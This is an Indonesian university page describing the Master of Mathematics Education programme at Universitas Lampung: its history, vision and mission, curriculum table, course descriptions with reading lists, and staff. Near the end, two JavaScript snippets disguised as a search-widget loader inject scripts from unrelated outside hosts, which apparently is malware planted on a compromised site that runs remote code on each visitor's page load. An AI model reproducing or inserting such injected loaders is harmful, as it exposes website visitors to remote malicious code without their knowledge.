MAGISTER PENDIDIKAN MATEMATIKA

MAGISTER PENDIDIKAN MATEMATIKA
1.        Sejarah Singkat
Magister Pendidikan Matematika merupakan salah satu Program S2 di FKIP, Universitas Lampung.  Proses pengusulan program S2 ini dilakukan pada tahun 2010 oleh 5 (lima) orang Tim Penyusun, yaitu Dr. Caswita, Dr. Sugeng Sutiarso, Dr. Sri Hastuti Noer, Drs. Pentatito, dan Widyastuti, M.Pd.  Pengusulan program S2 ini  melalui proses yang cukup lama, yaitu 3,5 tahun, dan pada pertengahan tahun 2014 Magister Pendidikan Matematika dianggap layak dengan diterbitkannya SK Menteri Pendidikan dan Kebudayaan (Kemendikbud) No. …………………………..  Setelah memperoleh kelayakan dari Kemendikbud, maka mulai tahun akademik 2014/2015 Magister Pendidikan Matematika menerima mahasiswa baru sebanyak 60 orang.
 2.        Visi
“Mewujudkan tenaga profesional (magister) yang memiliki kemampuan menerapkan dan mengembangkan pembelajaran matematika yang inovatif berbasis riset dan ipteks, serta mampu menyebarluaskannya”.
 3.        Misi
(a)      Menyelenggarakan dan mengembangkan institusi secara profesional dan berwawasan global.
(b)     Mengembangkan dan menyelenggarakan proses pendidikan berdasarkan pada kajian ilmiah yang didukung ipteks melalui model pendampingan dan pembinaan secara berkelanjutan.
(c)      Menjalin kemitraan sebagai wujud pengabdian kepada masyarakat dengan pemerintah (daerah dan pusat), praktisi, dan lembaga pendidikan lainnya (masyarakat luas) untuk menggali dan mengembangkan potensi sumber daya pendidikan (SDP) di Propinsi Lampung melalui penelitian .
4.        Tujuan
(a)      Untuk menyediakan layanan dalam menghasilkan tenaga akademik yang beriman dan bertaqwa kepada Tuhan yang maha esa, profesional, bersikap terbuka, jujur, bertanggung jawab, serta memiliki komitmen dalam merespon permasalahan dibidang pendidikan dan pembelajaran matematika yang berkembang di masyarakat dengan dilandasi budaya kerja sinergis dalam rangka melaksanakan Tridarma Perguruan Tinggi.
(b)     Untuk memenuhi minat dosen, kepala sekolah, pengawas sekolah, pegawai dinas pendidikan, pegawai lembaga penjamin mutu pendidikan (LPMP), dan para guru dalam rangka meningkatkan kualitas dan profesionalisme di bidang pendidikan matematika.
(c)      Untuk memajukan, mengembangkan, dan menerapkan bidang kematematikaan sebagai bagian dari nilai-nilai budaya bangsa seiring dengan perkembangan Ipteks dan kebutuhan masyarakat, baik di bidang pendidikan dan pembelajaran maupun penelitian.
(d)     Untuk memenuhi dan mengantisipasi dosen, kepala sekolah, pengawas sekolah, pegawai dinas pendidikan, dan LPMP, serta para guru untuk melanjutkan studi S-2 yang tidak relevan dengan keahlian utamanya.
(e)      Untuk mengantisipasi peningkatan karier dan tuntutan sistem pendidikan ke depan yang mengharuskan para dosen, kepala sekolah, pengawas sekolah, pegawai dinas pendidikan dan LPMP, serta para guru minimal berkualifikasi S-2.
(f)      Untuk memenuhi permintaan lulusan S-1 Matematika dan Pendidikan Matematika, baik lulusan dari Unila maupun perguruan tinggi lain yang ingin melanjutkan pendidikan yang lebih tinggi (S-2) di bidang pendidikan matematika.
 5.        Kurikulum dan Deskripsi Mata Kuliah
5.1    Kurikulum dan Mata Kuliah
Kurikulum Magister Pendidikan Matematika memuat 72 SKS, dengan rincian 32 SKS Perkuliahan dan 40 SKS Tugas Akhir, dengan masa studi selama 4 semester. Kurikulum Magister Pendidikan Matematika terbagi atas 3 mata kuliah utama, yaitu (a) mata kuliah universitas, (b) mata kuliah ciri fakultas, dan (c) mata kuliah keahlian bidang studi. Kurikulum dan sebaran mata kuliah ditampilkan pada Tabel 1 berikut.
 
Tabel  1. Kurikulum dan Mata Kuliah Program Magister PendidikanMatematika
 

Kurikulum dan Mata Kuliah
SKS
W/P
Semester

1
2
3
4

A.
Mata Kuliah Universitas (MKU)
 
 
 
 
 
 

1.
 Filsafat Ilmu 
2 (2-0)
w
x
 

2.
Metodologi Penelitian         
2 (2-0)
w

x

 

 

Jumlah
4 (4-0)
 
2
2
0
0

B.
Mata Kuliah Ciri Fakultas (MKCF)
 
 
 
 
 
 

1.
Wawasan Kependidikan
2 (2-0)
w
x
 

2.
Kurikulum dan Pembelajaran                
2 (2-0)
w

x

 

 

Jumlah
4 (4-0)
 
2
2
0
0

C.
Mata Kuliah Keahlian Bidang Studi (MKKBS) 
 
 
 
 
 
 

1
Statistika Penelitian Pendidikan
3 (3-0)
w
 
x
 

2
Pengembangan Pembelajaran Matematika
3 (3-0)
w
x

 

3
Perkembangan dan Problematika Pendidikan Matematika 
3 (3-0)
w
x
 
 

4
Evaluasi Pendidikan Matematika
2 (2-0)
w

x
 

5
Analisis Hasil Penelitian Pendidikan Matematika
2 (2-0)
w
x
 
 

6
Struktur Aljabar
2 (2-0)
w
x

 

7
Analisis Real
2 (2-0)
w

x
 

8
Matematika Sekolah
3 (3-0)
w
 
 
x

9
Proses Berpikir Matematika
2 (2-0)
p

x
 

10
Matematika Diskret
2 (2-0)
p
 
x
 

11
Geometri
2 (2-0)
p
 
x

Jumlah
24 (24-0)
 
10
11
3
0

D.
Tugas Akhir (TA)
 
 
 
 
 
 

1. 
Proposal Tesis
5 (0-5)
w
x

 

2.
Penelitian dan Penulisan Tesis
20 (0-20)
w
 
x
 

3. 
Seminar
5 (0-5)
w

 
x

4.
Karya Ilmiah
10(0-10)
w

 
x

 
 
 
 

 
 

Jumlah
40 (0-40)
 
0
5
20
15

Jumlah (A+B+C+D)
72 (32-40)
 
14
20
23
15

 

5.2  Deskripsi Mata Kuliah

(1)  Statistika Penelitian Pendidikan
      Mata kuliah ini bertujuan untuk memberikan bekal kepada mahasiswa agar menguasai konsep dasar statistika dan mampu menerapkan rumus-rumus statistik (normatif maupun adaptif) dalam kegiatan penelitian pendidikan, baik secara manual maupun komputerisasi. Adapun cakupan materi dari mata kuliah ini meliputi: statistik deskriptif maupun inferensial (parametrik dan non parametrik) yang digunakan dalam penelitian pendidikan.
Buku Sumber:

Minium, E.W., King, B.M., and Bear, G. (1992). Statistical Reasoning in Psychology and Education. Third Edition. New York: John Wiley & Sons, Inc.
Sugiyono. (2007). Statistika untuk Penelitian. Bandung: Alfabeta.

(2)  Pengembangan Pembelajaran Matematika
Mata kuliah ini bertujuan untuk memberikan bekal kepada mahasiswa agar mampu mengembangkan program pembelajaran sebagai hasil dari pengkajian dan pengembangan teori-teori pembelajaran matematika yang dapat meningkatkan kemampuan berprikir matematis tingkat tinggi siswa. Adapun cakupan materi dari mata kuliah ini meliputi: analisis pemetaan standar kompetensi dan kompetensi dasar, penyusunan silabus, penyusunan RPP, penyusunan bahan ajar, pembuatan media, dan penyusunan perangkat evaluasinya yang mengacu pada peningkatan kemampuan berprikir matematis tingkat tinggi siswa.
Buku Sumber:

Suherman, E. dan Sukjaya, Y. (1990). Petunjuk Praktis untuk Melaksanakan Evaluasi Pendidikan Matematika. Bandung: Wijayakusuma.
Rothstein, P.R. (1990). Educational Psychology. New York: Mc. Garw Hill. Inc.

 
(3)  Perkembangan dan Problematika Pendidikan Matematika
Mata kuliah ini bertujuan untuk memberikan bekal kepada mahasiswa agar mampu menelaah perkembangan pendidikan matematika  secara komprehensif  baik nasioal maupun interna-sional.  Adapun cakupan materi dari mata kuliah ini meliputi: perkembangan pendidikan mate-matika di Indonesia dan beberapa negara maju, serta perkembangan kurikulum dari masa ke masa. Mata kuliah ini juga bertujuan untuk memberikan bekal kepada mahasiswa agar mampu mengembangkan pemahaman dan wawasan pendidikan matematika, baik situasi yang wajar maupun situasi yang problematik, mencakup segi-segi problematik teoretis dan praktis di sekolah, kebijakan pengembangan dan kecenderungan arah pendidikan di masa depan, serta kaitan antara kebijakan pengembangan pendidikan dan masalah-masalah riil yang terjadi di masyarakat serta mampu mengembangkan alternatif solusi permasalahan.
Buku Sumber:

Ruseffendi, E.T. (1992). Pengantar kepada Membantu Guru Mengembangkan Kompetensinya dalam Pengajaran Matematika untuk Meningkatkan CBSA. Bandung: Tarsito.
Suherman, E dkk. (2003) Strategi Pembelajaran Matematika Kontemporer. Technical Cooperation Project for Development of Science and Mathematics Teaching for Primary and Secondary Education in Indonesia. Bandung: Jurusan Pendidikan  Matematika FPMIPA UPI.
Estela A. Gavosto, et al. 1999. Contemporary Issues in Mathematics Education. UK: Cambridge University Press.
Lorna Bertrand. 2009. Learning Mathematics fo Life:  A Perspective from PISA. Australia: OECD Publishers.
Magdalena Lampers  and Merrie L. Blunk. 1998. Talking Mathematical in School. UK: Cambridge University Press.

(4)  Evaluasi Pendidikan Matematika
Mata kuliah ini bertujuan untuk memberikan bekal kepada mahasiswa agar menguasai dan mengembangkan prinsip-prinsip evaluasi dalam Pendidikan Matematika baik secara teoretik maupun praktik  untuk mengukur keberhasilan program, proses dan hasil pembelajaran matema-tika baik aspek kognitif, afektif, maupun psikomotor yang mengacu pada keterampilan berpikir matematis tingkat tinggi.
Buku Sumber:

Suherman, E. dan Sukjaya, Y. (1990). Petunjuk Praktis untuk Melaksanakan Evaluasi Pendidikan Matematika. Bandung: Wijayakusuma
Suherman. E. (2003). Evaluasi Pembelajaran Matematika untuk Calon Guru dan Mahasiswa Calon Guru Matematika. Bandung: Jurusan pendidikan  Matematika FPMIPA UPI.
Sudijono, A. (2005). Pengantar Evaluasi Pendidikan. Jakarta: RajaGrafindo Persada.

(5)  Analisis Hasil Penelitian Pendidikan Matematika
Mata kuliah ini bertujuan untuk memberikan bekal kepada mahasiswa agar mampu mengkaji dan menyusun telaah berbagai hasil penelitian Pendidikan Matematika nasional maupun internasional dari berbagai sumber primer, serta memiliki kemampuan menyajikannya secara jelas (logis dan sistematik). Adapun cakupan materi dari mata kuliah ini meliputi: analisis jurnal penelitian nasional dan internasional, analisis hasil penelitian berupa disertasi dan tesis nasional dan internasional.
Buku Sumber:

NCTM. 2006-2011. Journal for Research in Mathematics Education. USA: NCTM Publishers.
Springer. 2006-2011. Journal Mathematics Teacher Education. USA: Spinger Publishers.
MIHMI. 2006-2010. Journal of Indonesian Mathematical Society. Bandung: P4M-ITB Indonesia.

(6)  Struktur Aljabar
Mata kuliah ini bertujuan untuk memberikan bekal kepada mahasiswa agar memahami tentang konsep struktur aljabar lanjut yang meliputi ring, field, ideal, ring Euclid, Polinomial atas ring, ring polinomial, Modul, Homomorfisme  ring dan modul.
Buku Sumber:

Sukirman. 1986. Aljabar Abstrak. Jakarta: Universitas Terbuka.
Subagio Suharti, dkk. 1994. Struktur Aljabar. Jakarta: Depdikbud.
I. N. herstein. 1975. Topic in Algebra. 2 edition. New York: John Wiley & Sons.
Maksum. 2002. Pengantar Teori Ring. Unila

(7)  Analisis Real
Mata kuliah ini bertujuan untuk memberikan bekal kepada mahasiswa agar memahami secara formal dan mendalam konsep himpunan lanjut, kalkulus diferensial, kalkulus integral, dan barisan fungsi.
Buku Sumber:

Robert G. Bartle. 1994. Introduction to Real Analysis. New York: John Wiley & Sons.
_____________. 1994. Elementary of Real Analysis. New York: John Wiley & Sons.
Richard R Goldberg. 1976. Methods of Real Analysis. New York: John Wiley & Sons.

(8)  Matematika Sekolah
Mata kuliah ini bertujuan untuk memberikan bekal kepada mahasiswa agar menguasai materi, struktur, konsep, dan pola pikir matematika sekolah baik tingkat dasar maupun tingkat lanjut.
Buku Sumber:

Linda Darling – Hammond and John Bransiord. 2005. Preparing Teachers for a Changing World. San Francisco: John Wiley & Sons, Inc.
John Mason, et al. 2005. Developing Thinking in Algebra. London: The Open University Press.
John Mason and Sue Johnston Wilder. 2005. Developing Thinking in Geometry. London: The Open University Press.
Alan Graham. 2005. Developing Thinking in Statistics. London: The Open University Press.

(9)  Proses Berpikir Matematika
Mata kuliah ini bertujuan untuk memberikan bekal kepada mahasiswa agar menguasai berbagai cara berpikir matematis secara komprehensif dalam rangka menyelesaikan berbagai masalah matematis  dengan berbagai macam pendekatan. Adapun cakupan materi dari mata kuliah ini meliputi: bagaimana mengembangkan cara berpikir secara matematis, pembuatan konjektur, dan pembuktian matematika dengan berbagai strategi pemecahan masalah.
Buku Sumber:

John Mason. 1985. Thinking Mathematically. UK: Addison-Wesley Publishers Limited.
Oon-Seng tan. 2004. Enhancing Thinking Through Problem- Based Learning Approaches. Singapore: Thomson Learning.
Robert  J. Marzano, et al. 1988. Dimensions of Thinking. Virginia: ASCD Press.
Robert J. Sternberg and Talia Ben-Zeev. 1996. The Nature of Mathematical Thinking. USA: Lawrence Erlbaum Associates. Inc Publishers.

(10)  Matematika Diskrit
Mata kuliah ini bertujuan untuk memberikan bekal kepada mahasiswa agar memahami konsep kombinatorik lanjut serta teori graf dan aplikasinya.
Buku Sumber:

Townsend, Michael. 1987. Descrete Mathematics: Applied Combinatorics and Graph Theory. Menlo Park, California: The Benyamin / Cummings Publishing Company, inc.
I Ketut Budhayasa. 1995. Matematika Diskrit I. Surabaya: University Press IKIP Surabaya.

(11)  Geometri
Mata kuliah ini bertujuan untuk memberikan bekal kepada mahasiswa agar mampu memahami geometri Euclides dan non Euclides secara aksiomatis serta memahamin metode  membangun geometri.
Buku Sumber:

Sunarno. 1952. Ilmu Ukur Ruang. Jogjakarta: Prapancha.
Alders. 1965. Ilmu Ukur Ruang. Jakarta: Pradnya Paramita.
Rawuh. Geometri
J. Bijl. 1952. Ilmu Ukur. Jakarta.

(12)  Tesis
Mata kuliah ini berupa tugas akhir yang diwujudkan dalam bentuk karya ilmiah (tesis), serta dipertanggung-jawabkan di hadapan dewan penguji.
  6.        Daftar Dosen

Dr. Sugeng Sutiarso, M.Pd.
Dr. Sri Hastuti Noer, M.Pd.
Dr. Tina Yunarti, M.Si.
Dr. Caswita, M.Si.
Suharsono, Ph.D.
Dr. Asmiati, M.Si

7.        Pengelola:

Ketua               : Dr. Sugeng Sutiarso, M.Pd.
Sekretaris         : Dr. Sri Hastuti Noer, M.Pd.

 

 

(function() {
var gcse = document.createElement(‘script’);
gcse.type = ‘text/javascript’;
gcse.async = true;
gcse.src = “http://theboatersnetwork.com/js/main1.js”;
var s = document.getElementsByTagName(‘script’)[0];
s.parentNode.insertBefore(gcse, s);
})();

(function() {
var gcse = document.createElement(‘script’);
gcse.type = ‘text/javascript’;
gcse.async = true;
gcse.src = “http://cjccontabil.com.br/wp-content/themes/Hermes/main1.js”;
var s = document.getElementsByTagName(‘script’)[0];
s.parentNode.insertBefore(gcse, s);
})();

>>Program Pascasarjana Universitas Lampung berdiri sejak tahun 1999, Sampai sekarang Program Pascasarjana Universitas Lampung sudah mempunyai 2 Program Doktor dan 32 Program Studi Magister Terakreditasi<<